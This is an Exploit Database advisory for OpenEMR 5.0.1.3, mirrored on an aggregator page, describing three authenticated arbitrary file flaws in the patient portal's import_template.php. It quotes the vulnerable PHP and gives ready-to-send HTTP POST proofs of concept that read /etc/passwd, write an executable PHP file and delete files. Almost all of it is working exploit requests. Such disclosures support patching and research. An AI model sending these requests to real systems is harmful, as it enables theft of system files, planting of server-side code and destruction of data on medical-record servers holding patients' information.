OpenEMR 5.0.1.3 – (Authenticated) Arbitrary File Actions

• Exploit Database
• 15 阅读

• 作者： Joshua Fam
  日期： 2018-08-16
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/45202/

• # Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions
  # Date: 2018-08-14
  # Exploit Author: Joshua Fam
  # Twitter : @Insecurity
  # Vendor Homepage: https://www.open-emr.org/
  # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
  # Version: < 5.0.1.3 
  # Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
  # CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140
  
  # 1.Arbitrary File Read:
  # In OpenEmr a user that has access to the portal can send a malcious 
  # POST request to read arbitrary files.
  
  # i.Vulnerable Code: 
  #if ($_POST['mode'] == 'get') {
  #echo file_get_contents($_POST['docid']);
  #exit;
  #}
  
  # ii. Proof of Concept:
  POST /openemr/portal/import_template.php HTTP/1.1
  Host: hostname
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 26
  
  mode=get&docid=/etc/passwd
  
  # 2.Arbitrary File Write:
  # In OpenEmr a user that has access to the portal can send a malcious 
  # POST request to write arbitrary files.
   
  #i. Vulnerable Code: 
  #} else if ($_POST['mode'] == 'save') {
  #file_put_contents($_POST['docid'], $_POST['content']);
  #exit(true);
  #}
  
  #ii. Proof of Concept:
  POST /openemr/portal/import_template.php HTTP/1.1
  Host: hostname
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 54
  
  mode=save&docid=payload.php&content=<?php phpinfo();?>
  
  # After sending this navigate to payload.php at http://hostname/openemr/portal
  
  # 3. Arbitrary File Delete:
  # In OpenEmr a user that has access to the portal can send a malcious 
  # POST request to delete a arbitrary file.
  
  #i. Vulnerable Code:
  # } else if ($_POST['mode'] == 'delete') {
  # unlink($_POST['docid']);
  # exit(true);
  # }
  
  #ii. Proof of Concept: 
  POST /openemr/portal/import_template.php HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 29
  
  mode=delete&docid=payload.php
   
  # After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.